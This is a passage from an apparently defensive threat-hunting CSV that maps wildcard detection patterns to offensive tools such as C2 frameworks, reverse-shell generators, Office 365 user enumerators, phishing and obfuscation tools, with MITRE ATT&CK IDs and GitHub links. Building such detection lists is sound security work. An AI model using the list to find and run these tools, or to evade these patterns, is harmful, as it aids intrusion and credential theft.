attempts,T1592.002 - T1596,TA0007,N/A,N/A,Network Exploitation tools,https://github.com/LMGsec/o365creeper,1,1,N/A,N/A,3,265,57,2020-08-07T17:40:41Z,2019-07-12T21:32:05Z -*o365creeper-master*,offensive_tool_keyword,o365creeper,Python script that performs email address validation against Office 365 without submitting login attempts,T1592.002 - T1596,TA0007,N/A,N/A,Network Exploitation tools,https://github.com/LMGsec/o365creeper,1,1,N/A,N/A,3,265,57,2020-08-07T17:40:41Z,2019-07-12T21:32:05Z -*o365enum.py*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,1,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*o365enum-master*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,1,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*o365recon*,offensive_tool_keyword,o365recon,script to retrieve information via O365 with a valid cred,T1087 - T1074 - T1003 - T1002 - T1552,TA0003 - TA0011 - TA0006,N/A,N/A,Information Gathering,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*o365recon.git*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*o365recon.ps1*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - 
TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*o365recon-master*,offensive_tool_keyword,o365recon,script to retrieve information via O365 and AzureAD with a valid cred ,T1110 - T1081 - T1081.001 - T1114 - T1087,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/nyxgeek/o365recon,1,1,N/A,N/A,7,617,94,2022-08-14T04:18:28Z,2017-09-02T17:19:42Z -*oab-parse.py*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*oaburl.py */*:*@* -e *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*obfuscate.py grunt*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*Obfuscate.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*obfuscate/shellter*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*obfuscate_cmdlet*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*obfuscate_command*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*obfuscated_module_source/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1051,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*obfuscator*antidisassembly.*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,1,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*obfuscator.cpp*,offensive_tool_keyword,Alcatraz,x64 binary obfuscator,T1027 - T1140,TA0004 - TA0042,N/A,N/A,Defense Evasion,https://github.com/weak1337/Alcatraz,1,0,N/A,10,10,1345,219,2023-07-14T14:19:01Z,2022-12-21T17:27:56Z -*obfuskittiedump*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*objects.githubusercontent.com/github-production-release-asset-*,greyware_tool_keyword,github,Github executables download initiated - abused by malwares to retrieve payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*objects_constrained_delegation_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*objects_rbcd_delegation_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,0,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*objects_unconstrained_delegation_full.txt*,offensive_tool_keyword,adhunt,Tool for exploiting Active Directory Enviroments - enumeration,T1018 - T1087 - T1087.002 - T1069 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,AD Enumeration,https://github.com/karendm/ADHunt,1,1,N/A,7,1,41,8,2023-08-10T18:55:39Z,2023-06-20T13:24:10Z -*objexec *.o*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*obscuritylabs*,offensive_tool_keyword,Github Username,resources for pentesters,N/A,N/A,N/A,N/A,Exploitation 
tools,https://github.com/obscuritylabs,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*obscuritylabs/ase:latest*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*obscuritylabs/RAI/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*OCSAF/freevulnsearch*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,1,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*octetsplicer/LAZYPARIAH*,offensive_tool_keyword,LAZYPARIAH,LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly,T1059 - T1566 - T1212 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/octetsplicer/LAZYPARIAH,1,1,N/A,N/A,2,136,30,2022-06-18T08:59:45Z,2020-11-20T05:08:36Z -*Octoberfest7/KDStab*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*Octoberfest7/TeamsPhisher*,offensive_tool_keyword,teamsphisher,Send phishing messages and attachments to Microsoft Teams users,T1566.001 - T1566.002 - T1204.001,TA0001 - TA0005,N/A,N/A,phishing,https://github.com/Octoberfest7/TeamsPhisher,1,1,N/A,N/A,9,831,109,2023-07-14T00:23:30Z,2023-07-03T02:19:47Z -*octopus.py *,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,0,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*OEP_Hiijack_Inject_Load*,offensive_tool_keyword,C2 related tools,A shellcode loader written using nim,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*offensive_notion.exe*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - 
TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*offensive_notion_darwin_*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*offensive_notion_linux_*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*offensive_notion_win_*.exe*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,1,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*OffensiveCSharp*DriverQuery*,offensive_tool_keyword,DriverQuery,Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft,T1124 - T1057 - T1082,TA0007 - TA0003,N/A,N/A,Discovery,https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*OffensiveCSharp*ETWEventSubscription*,offensive_tool_keyword,ETWEventSubscription,Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.,T1053.005 - T1546.003 - T1055.001,TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*OffensiveCSharp-master*,offensive_tool_keyword,OffensiveCSharp,Collection of Offensive C# Tooling,T1059.001 - T1055.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*office2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*office365userenum.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Office-DDE-Payloads*,offensive_tool_keyword,Office-DDE-Payloads,Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.,T1221 - T1222 - T1223,TA0001 - TA0002 - TA0003,N/A,N/A,Phishing,https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads,1,1,N/A,N/A,7,623,161,2023-07-16T08:22:24Z,2017-10-27T22:19:17Z -*Offline_WinPwn.ps1*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*offsecginger/koadic*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,0,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*OG-Sadpanda/SharpCat*,offensive_tool_keyword,cobaltstrike,C# alternative to the linux cat command... Prints file contents to console. 
For use with Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCat,1,1,N/A,10,10,16,5,2021-07-15T15:01:02Z,2021-07-15T14:57:53Z -*OG-Sadpanda/SharpSword*,offensive_tool_keyword,cobaltstrike,Read the contents of DOCX files using Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,10,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*OG-Sadpanda/SharpSword*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*OG-Sadpanda/SharpZippo*,offensive_tool_keyword,cobaltstrike,List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpZippo,1,1,N/A,10,10,55,10,2022-05-24T15:57:33Z,2022-05-24T15:52:31Z -*Oh365UserFinder.git*,offensive_tool_keyword,Oh365UserFinder,Oh365UserFinder is used for identifying valid o365 
